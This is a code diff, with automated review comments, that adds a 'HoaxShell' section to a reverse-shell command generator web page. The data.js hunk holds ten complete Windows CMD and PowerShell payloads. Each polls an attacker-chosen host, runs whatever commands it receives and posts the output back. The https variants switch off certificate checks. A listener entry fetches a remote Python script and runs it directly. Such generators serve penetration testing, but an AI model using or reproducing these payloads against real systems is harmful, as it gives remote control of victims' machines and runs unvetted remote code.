diff --git a/css/dark-mode.css b/css/dark-mode.css
index 8773912..bd715c5 100644
--- a/css/dark-mode.css
+++ b/css/dark-mode.css
@@ -69,6 +69,14 @@ _:-ms-fullscreen, :root body {
max-height: 20rem;
}
+#hoaxshell-command {
+ border: none !important;
+ border-radius: 5px;
+ box-shadow: 10px 10px 20px 0px rgba(0, 0, 0, 0.75);
+ background-color: rgb(70, 70, 70);
+ max-height: 20rem;
+}
+
#theme-selector {
width: 100px;
height: 30px;
@@ -136,4 +144,4 @@ h2 {
.github-corner .octo-arm {
animation: octocat-wave 560ms ease-in-out
}
-}
\ No newline at end of file
+}
diff --git a/css/light-mode.css b/css/light-mode.css
index e848302..cd3d619 100644
--- a/css/light-mode.css
+++ b/css/light-mode.css
@@ -103,6 +103,15 @@ Ain't got time for using CSS the right way. !important everything!
max-height: 20rem;
}
+[data-theme="light"] #hoaxshell-command {
+ border: none !important;
+ border-radius: 5px;
+ box-shadow: 10px 10px 20px 0px rgba(209, 209, 209, 0.75);
+ background-color: rgb(45, 139, 135);
+ color: #000;
+ max-height: 20rem;
+}
+
[data-theme="light"] .custom-select {
background-color: #f2f2f2;
color: #000;
diff --git a/css/meme-mode.css b/css/meme-mode.css
index 205ec60..4a1a796 100644
--- a/css/meme-mode.css
+++ b/css/meme-mode.css
@@ -108,6 +108,15 @@ Ain't got time for using CSS the right way. !important everything!
max-height: 20rem;
}
+[data-theme="meme"] #hoaxshell-command {
+ border: none !important;
+ border-radius: 5px;
+ box-shadow: 10px 10px 20px 0px rgba(153, 28, 143, 0.75);
+ background-color: rgb(45, 139, 135);
+ color: #000;
+ max-height: 20rem;
+}
+
[data-theme="meme"] .custom-select {
background-color: #f1c6ce;
color: #000;
@@ -330,4 +339,4 @@ Ain't got time for using CSS the right way. !important everything!
100% {
color: orange;
}
-}
\ No newline at end of file
+}
diff --git a/index.html b/index.html
index 8a6bc93..89d2662 100644
--- a/index.html
+++ b/index.html
@@ -192,6 +192,10 @@
MSFVenom
+
+ HoaxShell
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/js/data.js b/js/data.js
index 7cb152f..bad3d2b 100644
--- a/js/data.js
+++ b/js/data.js
@@ -2,7 +2,8 @@
const CommandType = {
'ReverseShell': 'ReverseShell',
'BindShell': 'BindShell',
- 'MSFVenom': 'MSFVenom'
+ 'MSFVenom': 'MSFVenom',
+ 'HoaxShell': 'HoaxShell'
};
const withCommandType = function (commandType, elements) {
@@ -471,11 +472,68 @@ const msfvenomCommands = withCommandType(
]
);
+
+const hoaxShellCommands = withCommandType(
+ CommandType.HoaxShell,
+ [
+ {
+ "name": "Windows CMD cURL",
+ "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell IEX",
+ "command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell IEX Constr Lang Mode",
+ "command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell Outfile",
+ "command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell Outfile Constr Lang Mode",
+ "command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "Windows CMD cURL https",
+ "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell IEX https",
+ "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell Constr Lang Mode IEX https",
+ "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell Outfile https",
+ "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+ "meta": ["windows"]
+ },
+ {
+ "name": "PowerShell Outfile Constr Lang Mode https",
+ "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+ "meta": ["windows"]
+ }
+ ]
+);
+
const rsgData = {
listenerCommands: [
['nc', 'nc -lvnp {port}'],
- ['busybox nc', 'busybox nc -lp {port}'],
+ ['busybox nc', 'busybox nc -lp {port}'],
['ncat', 'ncat -lvnp {port}'],
['ncat.exe', 'ncat.exe -lvnp {port}'],
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
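Review bot: The `hoaxShellCommands` array is added without any comment, and the entry names alone do not tell a maintainer that every `https` variant switches off TLS certificate validation (`curl -k` in the CMD entry, a `TrustAllCertsPolicy` assigned to `ServicePointManager.CertificatePolicy` in the PowerShell ones). I would add a header comment above the array such as `// HoaxShell payloads; the "https" variants disable certificate validation and each entry carries a fixed Authorization value.` The comment should also say that `name` doubles as a lookup key (it appears to index `hoaxshell_listener_types` through `getType` in js/script.js), so renaming an entry needs a matching change there.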
@@ -487,7 +545,8 @@ const rsgData = {
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
['powercat', 'powercat -l -p {port}'],
- ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
+ ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'],
+ ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}']
],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
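Review bot: The new `hoaxshell` listener entry has the user run `python3 -c "$(curl -s …/main/…)"`, which executes whatever the `main` branch of a third-party repository serves at that moment, with no pinning or integrity check, and `curl -s` hides transfer errors. A later change to that repository, or a compromise of it, would run on the machine of everyone who pastes this command. I would pin the URL to a reviewed commit, replacing `/main/` with `/<commit-sha>/` (placeholder), or generate a download, inspect, then run sequence instead of feeding the response straight to the interpreter. The `listenerCommands` array starts outside this hunk.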
@@ -501,9 +560,25 @@ const rsgData = {
reverseShellCommands: [
...reverseShellCommands,
...bindShellCommands,
- ...msfvenomCommands
+ ...msfvenomCommands,
+ ...hoaxShellCommands
]
-}
+};
+
+const hoaxshell_listener_types = {
+
+ "Windows CMD cURL" : "cmd-curl",
+ "PowerShell IEX" : "ps-iex",
+ "PowerShell IEX Constr Lang Mode" : "ps-iex-cm",
+ "PowerShell Outfile" : "ps-outfile",
+ "PowerShell Outfile Constr Lang Mode" : "ps-outfile-cm",
+ "Windows CMD cURL https" : "cmd-curl -c /your/cert.pem -k /your/key.pem",
+ "PowerShell IEX https" : "ps-iex -c /your/cert.pem -k /your/key.pem",
+ "PowerShell IEX Constr Lang Mode https" : "ps-iex-cm -c /your/cert.pem -k /your/key.pem",
+ "PowerShell Outfile https" : "ps-outfile -c /your/cert.pem -k /your/key.pem",
+ "PowerShell Outfile Constr Lang Mode https" : "ps-outfile-cm -c /your/cert.pem -k /your/key.pem"
+
+};
// Export the data for use within netlify functions / node
if (typeof exports !== 'undefined') {
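Review bot: The key `"PowerShell IEX Constr Lang Mode https"` in `hoaxshell_listener_types` matches no command name, because the entry added earlier in this file is named `"PowerShell Constr Lang Mode IEX https"`. If `getType` in js/script.js looks the selected name up in this map, as it appears to, that selection yields `undefined` and the listener command is rendered with the text `undefined` in place of `{type}`. Make the two strings identical, for example by renaming the command entry to `"PowerShell IEX Constr Lang Mode https"` so it follows the pattern of the other names. The map is also written in snake_case where the surrounding constants are camelCase, and the export block that opens on the last line of this hunk continues outside it, so whether the map is exported cannot be seen here.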
diff --git a/js/script.js b/js/script.js
index e9d1a41..da6ef86 100644
--- a/js/script.js
+++ b/js/script.js
@@ -10,6 +10,7 @@ const listenerCommand = document.querySelector("#listener-command");
const reverseShellCommand = document.querySelector("#reverse-shell-command");
const bindShellCommand = document.querySelector("#bind-shell-command");
const msfVenomCommand = document.querySelector("#msfvenom-command");
+const hoaxShellCommand = document.querySelector("#hoaxshell-command");
const FilterType = {
'All': 'all',
@@ -54,6 +55,15 @@ encoding: "None"
});
});
+
+document.querySelector("#hoaxshell-tab").addEventListener("click", () => {
+ document.querySelector("#hoaxshell-selection").innerHTML = "";
+ rsg.setState({
+ commandType: CommandType.HoaxShell,
+ encoding: "None"
+ });
+});
+
var rawLinkButtons = document.querySelectorAll('.raw-listener');
for (const button of rawLinkButtons) {
button.addEventListener("click", () => {
@@ -93,6 +103,7 @@ const rsg = {
ip: query.get('ip') || localStorage.getItem('ip') || '10.10.10.10',
port: query.get('port') || localStorage.getItem('port') || 9001,
payload: query.get('payload') || localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
+ payload: query.get('type') || localStorage.getItem('type') || 'cmd-curl',
shell: query.get('shell') || localStorage.getItem('shell') || rsgData.shells[0],
listener: query.get('listener') || localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
encoding: query.get('encoding') || localStorage.getItem('encoding') || 'None',
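Review bot: The added line reuses the key `payload`, so in this object literal it overrides the `payload` entry directly above it, and the msfvenom default `'windows/x64/meterpreter/reverse_tcp'` is replaced by `'cmd-curl'` (or by whatever `type` holds in the query string or localStorage). The key was presumably meant to be `type`: `type: query.get('type') || localStorage.getItem('type') || 'cmd-curl',`. Nothing visible in this diff reads `rsg.type`, since `getType` derives its value from the selected command name, so dropping the line is the other option. The `rsg` object starts and ends outside this hunk.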
@@ -100,6 +111,7 @@ const rsg = {
[CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name,
[CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name,
[CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name,
+ [CommandType.HoaxShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.HoaxShell })[0].name,
},
commandType: CommandType.ReverseShell,
filter: FilterType.All,
@@ -116,6 +128,10 @@ const rsg = {
[CommandType.MSFVenom]: {
listSelection: '#msfvenom-selection',
command: '#msfvenom-command'
+ },
+ [CommandType.HoaxShell]: {
+ listSelection: '#hoaxshell-selection',
+ command: '#hoaxshell-command'
}
},
@@ -169,6 +185,16 @@ const rsg = {
},
+ getType: () => {
+ if (rsg.commandType === 'HoaxShell') {
+ let cmd_name = rsg.getSelectedCommandName();
+ return hoaxshell_listener_types[cmd_name];
+ }
+
+ return 'cmd-curl'
+
+ },
+
generateReverseShellCommand: () => {
let command
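Review bot: `getType` returns `undefined` whenever the selected command name has no entry in `hoaxshell_listener_types`, and the `{type}` substitution elsewhere in this file then writes that value into the listener command; a fallback keeps the output well-formed: `return hoaxshell_listener_types[cmd_name] || 'cmd-curl';`. The comparison should use the enum the file already defines, `rsg.commandType === CommandType.HoaxShell`, rather than the string literal `'HoaxShell'`. `cmd_name` is never reassigned and can be a camelCase `const` like the neighbouring code, and the final `return 'cmd-curl'` is missing its semicolon. `generateReverseShellCommand`, which begins on the last lines of this hunk, continues outside it.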
@@ -358,6 +384,7 @@ const rsg = {
command = command.replace('{port}', rsg.getPort())
command = command.replace('{ip}', rsg.getIP())
command = command.replace('{payload}', rsg.getPayload())
+ command = command.replace('{type}', rsg.getType())
if (rsg.getPort() < 1024) {
privilegeWarning.style.visibility = "visible";
@@ -456,6 +483,10 @@ document.querySelector('#copy-msfvenom-command').addEventListener('click', () =>
rsg.copyToClipboard(msfVenomCommand.innerText)
})
+document.querySelector('#copy-hoaxshell-command').addEventListener('click', () => {
+ rsg.copyToClipboard(hoaxShellCommand.innerText)
+})
+
var downloadButton = document.querySelectorAll(".download-svg");
for (const Dbutton of downloadButton) {
Dbutton.addEventListener("click", () => {